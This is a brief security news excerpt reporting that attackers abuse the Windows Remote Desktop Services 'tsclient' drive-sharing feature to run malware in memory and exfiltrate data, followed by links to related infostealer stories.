Threat actors breaching company networks are deploying a cornucopia of malware over the remote desktop protocol (RDP), without leaving a trace on target hosts.
Cryptocurrency miners, info-stealers, and ransomware are executed in RAM using a remote connection, which also serves for exfiltrating useful information from compromised machines.
Exploiting Windows RDS features
The attackers leveraged a feature in Windows Remote Desktop Services that allows a client to share local drives to a Terminal Server with read and write permissions.
These drives appear on the server as a share on a virtual network location called 'tsclient' followed by the letter of the drive and can be mapped locally.
....
Windows Remote Assistance Vulnerability Allow Attacker to Bypass Security Features
Infostealers without borders: macOS, Python stealers, and platform abuse (A report by Microsoft)
TikTok videos now push infostealer malware in ClickFix attacks